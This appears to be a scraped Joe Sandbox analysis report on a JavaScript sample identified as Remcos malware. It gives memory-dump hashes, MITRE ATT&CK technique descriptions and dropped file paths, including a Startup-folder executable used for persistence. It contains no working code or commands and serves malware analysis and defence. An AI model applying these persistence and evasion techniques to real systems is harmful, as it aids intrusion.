Memory Dump Source

Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f2a12496a5c34d597b0c0d633a47877da29d5d5c066cfa8e1477b02c6f3d5364
Instruction ID: 2ff175bd2dae8e76cec295ed55c9ac28ce4bcf5c24543c2f9fb8b876c3c8a0a5
Opcode Fuzzy Hash: f2a12496a5c34d597b0c0d633a47877da29d5d5c066cfa8e1477b02c6f3d5364
Instruction Fuzzy Hash: 611126B1D046599BCB14CF9AD548B9EFBF4FB88324F00811AD829B7240D774A945CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0497FC48 Relevance: 1.4, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dl4l, xrefs: 0497FCF9

Memory Dump Source

Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_4970000_powershell.jbxd

Similarity

API ID:
String ID: dl4l
API String ID: 0-736318344
Opcode ID: ab8ca68b85a0e7c07217e391b1d00bf572dba70ce89d96310285b0e8eb509548
Instruction ID: 94ce3b32c4721079d321b7b22358a08919b1fa93662f14497a52db4cba80745d
Opcode Fuzzy Hash: ab8ca68b85a0e7c07217e391b1d00bf572dba70ce89d96310285b0e8eb509548
Instruction Fuzzy Hash: 7541C072600A108FDB24DF78D84069EBBB6FFC5354F014A6AD601DB394DBB6A9048B92

Uniqueness

Uniqueness Score: -1.00%

Function 04975E58 Relevance: .2, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_4970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb32c4f53e49ce8232d5aa62d4402dac27b8888c47deac35ac22bb620952b8e
Instruction ID: bc055031eded40316f8244e04448bc398ec968ae0eeec2464d0e81cd4bf53994
Opcode Fuzzy Hash: beb32c4f53e49ce8232d5aa62d4402dac27b8888c47deac35ac22bb620952b8e
Instruction Fuzzy Hash: 1981AC347006018FC708DF38D544A6EBBE2EF88358B1185A8E50ACB7A4DF75EC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049794F3 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_4970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 183621728104f55e9f0abb85db7f9f17ba9662321c38eb8b6454fda0058a5c4e
Instruction ID: 6fbebca2d969c4ae119c4f896384a890f2b309ffc709159aea2cd785fc9e2fc7
Opcode Fuzzy Hash: 183621728104f55e9f0abb85db7f9f17ba9662321c38eb8b6454fda0058a5c4e
Instruction Fuzzy Hash: FD41D1747046118BEB189B30E4A03BE7BA7EFC4349F144579D9068B794DF7AAD46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0497FE18 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_4970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966b12d0a2dfa5232fed00c35c5b9411042c2be53c73ba537a1a950591c1330c
Instruction ID: 868b013ca4dd3ed402cf2d7090db69761b77a18a038cbd55dba76a9ecd49b13a
Opcode Fuzzy Hash: 966b12d0a2dfa5232fed00c35c5b9411042c2be53c73ba537a1a950591c1330c
Instruction Fuzzy Hash: 35213631608A149FD724DB28C8407AA7BE5EF8134CF018968D149DB699DBF5BD0987A0

Uniqueness

Uniqueness Score: -1.00%

Function 049796F8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_4970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff256358fc5c8080115cf76baf1abd7252700019dac0f21b7330cfabb747eaf
Instruction ID: 8d8f8247561b748e8d8304b3b23edb2607c89eadb5e6fbafd688b8222d0d013e
Opcode Fuzzy Hash: 5ff256358fc5c8080115cf76baf1abd7252700019dac0f21b7330cfabb747eaf
Instruction Fuzzy Hash: A821B4718086448FDF14CF58D8806DDBBF4FF89328F14865ED008AB26AC775A946CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0497964B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_4970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a38c333513e0817f5cbd897603ebdcd5d0fcc6b985ca158706c3cfaa860a55
Instruction ID: f98fe4ced0c4aa87e55c32871d1df14945cde7e55a1c8c44e93e7bbe6ecf577a
Opcode Fuzzy Hash: 20a38c333513e0817f5cbd897603ebdcd5d0fcc6b985ca158706c3cfaa860a55
Instruction Fuzzy Hash: DC2133B1C012188FDB40CFA9D884BDEFBF4FF88314F14812AE808AB244D774A904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0497FBE9 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_4970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d37c2241e6ce134140e9457ec6f37d9a66760e8e409c79b14b11031c94099eb
Instruction ID: 2f868f12fac27639029fa39d35459afe7d882a9adb3a49f211d3fd657ce81b3b
Opcode Fuzzy Hash: 2d37c2241e6ce134140e9457ec6f37d9a66760e8e409c79b14b11031c94099eb
Instruction Fuzzy Hash: 7B11897250C3804FCB168B28D8513D6BFE0DF82316F0C84FADD888F196D2389914C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 04979650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_4970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9cab51a1bd5405ef153749bf87f87f43369902880fb38d8bc306b844af7fd37
Instruction ID: 8f3b1922d327c2908c7c1554ae26ca1e11bdcad59e4f21825ba4e3a95417819d
Opcode Fuzzy Hash: f9cab51a1bd5405ef153749bf87f87f43369902880fb38d8bc306b844af7fd37
Instruction Fuzzy Hash: 351103B1C052588FDB50CF99D884BDEFBF4FB89314F14816AE808AB244D774A904CBA1

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Order Specifications PDF.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Persistence and Installation Behavior

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Systedbddfm.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VNZVNCXKKJSF.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf32wont.1ox.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqrc4ufx.mh3.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

Static File Info

Windows Analysis Report
Order Specifications PDF.js

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre